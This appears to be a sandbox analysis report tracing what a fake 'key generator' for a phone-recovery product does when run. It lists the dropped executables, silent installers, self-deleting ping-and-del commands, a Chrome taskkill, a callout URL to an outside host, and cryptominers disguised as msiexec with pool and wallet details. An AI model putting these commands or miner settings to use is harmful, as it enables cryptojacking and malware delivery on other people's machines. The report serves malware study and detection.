description pid Process procid_target PID 496 wrote to memory of 204 496 Easeus.Mobisaver.3.5.key.generator.exe 78 PID 496 wrote to memory of 204 496 Easeus.Mobisaver.3.5.key.generator.exe 78 PID 496 wrote to memory of 204 496 Easeus.Mobisaver.3.5.key.generator.exe 78 PID 204 wrote to memory of 976 204 cmd.exe 81 PID 204 wrote to memory of 976 204 cmd.exe 81 PID 204 wrote to memory of 976 204 cmd.exe 81 PID 204 wrote to memory of 412 204 cmd.exe 82 PID 204 wrote to memory of 412 204 cmd.exe 82 PID 204 wrote to memory of 412 204 cmd.exe 82 PID 204 wrote to memory of 2272 204 cmd.exe 83 PID 204 wrote to memory of 2272 204 cmd.exe 83 PID 204 wrote to memory of 2272 204 cmd.exe 83 PID 204 wrote to memory of 1176 204 cmd.exe 84 PID 204 wrote to memory of 1176 204 cmd.exe 84 PID 204 wrote to memory of 1176 204 cmd.exe 84 PID 1176 wrote to memory of 2584 1176 keygen-step-4.exe 85 PID 1176 wrote to memory of 2584 1176 keygen-step-4.exe 85 PID 976 wrote to memory of 1124 976 keygen-pr.exe 86 PID 976 wrote to memory of 1124 976 keygen-pr.exe 86 PID 976 wrote to memory of 1124 976 keygen-pr.exe 86 PID 1124 wrote to memory of 2812 1124 key.exe 87 PID 1124 wrote to memory of 2812 1124 key.exe 87 PID 1124 wrote to memory of 2812 1124 key.exe 87 PID 2272 wrote to memory of 1396 2272 keygen-step-3.exe 88 PID 2272 wrote to memory of 1396 2272 keygen-step-3.exe 88 PID 2272 wrote to memory of 1396 2272 keygen-step-3.exe 88 PID 1396 wrote to memory of 3656 1396 cmd.exe 90 PID 1396 wrote to memory of 3656 1396 cmd.exe 90 PID 1396 wrote to memory of 3656 1396 cmd.exe 90 PID 2584 wrote to memory of 3808 2584 Setup.exe 91 PID 2584 wrote to memory of 3808 2584 Setup.exe 91 PID 2584 wrote to memory of 3892 2584 Setup.exe 92 PID 2584 wrote to memory of 3892 2584 Setup.exe 92 PID 2584 wrote to memory of 3892 2584 Setup.exe 92 PID 1176 wrote to memory of 2240 1176 keygen-step-4.exe 93 PID 1176 wrote to memory of 2240 1176 keygen-step-4.exe 93 PID 1176 wrote to memory of 2240 1176 keygen-step-4.exe 93 PID 3892 wrote to memory of 2968 3892 setups.exe 94 PID 3892 wrote to memory of 2968 3892 setups.exe 94 PID 3892 wrote to memory of 2968 3892 setups.exe 94 PID 2240 wrote to memory of 3080 2240 askinstall20.exe 95 PID 2240 wrote to memory of 3080 2240 askinstall20.exe 95 PID 2240 wrote to memory of 3080 2240 askinstall20.exe 95 PID 3080 wrote to memory of 2820 3080 cmd.exe 97 PID 3080 wrote to memory of 2820 3080 cmd.exe 97 PID 3080 wrote to memory of 2820 3080 cmd.exe 97 PID 1176 wrote to memory of 4288 1176 keygen-step-4.exe 102 PID 1176 wrote to memory of 4288 1176 keygen-step-4.exe 102 PID 1176 wrote to memory of 4288 1176 keygen-step-4.exe 102 PID 4288 wrote to memory of 4356 4288 Full Program Features.exe 103 PID 4288 wrote to memory of 4356 4288 Full Program Features.exe 103 PID 4288 wrote to memory of 4356 4288 Full Program Features.exe 103 PID 1176 wrote to memory of 4384 1176 keygen-step-4.exe 104 PID 1176 wrote to memory of 4384 1176 keygen-step-4.exe 104 PID 1176 wrote to memory of 4384 1176 keygen-step-4.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Easeus.Mobisaver.3.5.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Easeus.Mobisaver.3.5.key.generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:412
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\T017NKR9PQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T017NKR9PQ\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3808 -
C:\Users\Admin\AppData\Local\Temp\T017NKR9PQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T017NKR9PQ\multitimer.exe" 1 3.1617397654.606787969aa64 1016⤵PID:4952
-
C:\Users\Admin\AppData\Local\Temp\T017NKR9PQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T017NKR9PQ\multitimer.exe" 2 3.1617397654.606787969aa647⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\kf4gvu20uqb\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\kf4gvu20uqb\KiffApp1.exe"8⤵PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\dasxdvqzxw0\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\dasxdvqzxw0\cpyrix.exe" /VERYSILENT8⤵PID:3472
-
-
C:\Users\Admin\AppData\Local\Temp\lj1uuovad5h\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\lj1uuovad5h\Setup3310.exe" /Verysilent /subid=5778⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\is-695I8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-695I8.tmp\Setup3310.tmp" /SL5="$302E2,138429,56832,C:\Users\Admin\AppData\Local\Temp\lj1uuovad5h\Setup3310.exe" /Verysilent /subid=5779⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\sbvjzqpdhkd\oiyn0ey0l5x.exe"C:\Users\Admin\AppData\Local\Temp\sbvjzqpdhkd\oiyn0ey0l5x.exe" /ustwo INSTALL8⤵PID:5220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 6529⤵
- Program crash
PID:6036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 6689⤵
- Program crash
PID:5144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 6289⤵
- Program crash
PID:5276
-
-
-
C:\Users\Admin\AppData\Local\Temp\fl0l4zndugd\czkwagwhhjk.exe"C:\Users\Admin\AppData\Local\Temp\fl0l4zndugd\czkwagwhhjk.exe" /VERYSILENT8⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\is-SQLKR.tmp\czkwagwhhjk.tmp"C:\Users\Admin\AppData\Local\Temp\is-SQLKR.tmp\czkwagwhhjk.tmp" /SL5="$10364,2592217,780800,C:\Users\Admin\AppData\Local\Temp\fl0l4zndugd\czkwagwhhjk.exe" /VERYSILENT9⤵PID:5388
-
-
-
C:\Users\Admin\AppData\Local\Temp\1yis0cen534\vict.exe"C:\Users\Admin\AppData\Local\Temp\1yis0cen534\vict.exe" /VERYSILENT /id=5358⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\is-C74T9.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-C74T9.tmp\vict.tmp" /SL5="$1038A,870426,780800,C:\Users\Admin\AppData\Local\Temp\1yis0cen534\vict.exe" /VERYSILENT /id=5359⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\qsvwp5mfgmv\3mkesiulhig.exe"C:\Users\Admin\AppData\Local\Temp\qsvwp5mfgmv\3mkesiulhig.exe"8⤵PID:5520
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\qsvwp5mfgmv\3mkesiulhig.exe"9⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\bhhsnwhawmn\cbzaqqobxvt.exe"C:\Users\Admin\AppData\Local\Temp\bhhsnwhawmn\cbzaqqobxvt.exe" /quiet SILENT=1 AF=7568⤵PID:5560
-
-
C:\Users\Admin\AppData\Local\Temp\csloe15bfu5\app.exe"C:\Users\Admin\AppData\Local\Temp\csloe15bfu5\app.exe" /8-238⤵PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\x1vty43tw0b\vpn.exe"C:\Users\Admin\AppData\Local\Temp\x1vty43tw0b\vpn.exe" /silent /subid=4828⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\is-JPE63.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-JPE63.tmp\vpn.tmp" /SL5="$1045C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\x1vty43tw0b\vpn.exe" /silent /subid=4829⤵PID:5656
-
-
-
C:\Users\Admin\AppData\Local\Temp\35q2ajn4efx\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\35q2ajn4efx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\is-GBAUO.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-GBAUO.tmp\IBInstaller_97039.tmp" /SL5="$2044C,12322324,721408,C:\Users\Admin\AppData\Local\Temp\35q2ajn4efx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5808
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:5880
-
-
C:\Users\Admin\AppData\Local\Temp\is-MC4M7.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-MC4M7.tmp\{app}\chrome_proxy.exe"10⤵PID:5908
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RTW2ANVIQX\setups.exe"C:\Users\Admin\AppData\Local\Temp\RTW2ANVIQX\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\is-UMIC9.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UMIC9.tmp\setups.tmp" /SL5="$60058,635399,250368,C:\Users\Admin\AppData\Local\Temp\RTW2ANVIQX\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4356
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
PID:4384 -
C:\Users\Admin\AppData\Roaming\C809.tmp.exe"C:\Users\Admin\AppData\Roaming\C809.tmp.exe"5⤵PID:5112
-
C:\Users\Admin\AppData\Roaming\C809.tmp.exe"C:\Users\Admin\AppData\Roaming\C809.tmp.exe"6⤵PID:4988
-
-
-
C:\Users\Admin\AppData\Roaming\CC6F.tmp.exe"C:\Users\Admin\AppData\Roaming\CC6F.tmp.exe"5⤵PID:4308
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:384
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:2856
-
-
-
C:\Users\Admin\AppData\Roaming\CEF0.tmp.exe"C:\Users\Admin\AppData\Roaming\CEF0.tmp.exe"5⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:4112
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5072
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3928
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2980
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4268
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4716
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\e93d269570f0457c87e350d3cb6c6e54 /t 4604 /p 45321⤵PID:6080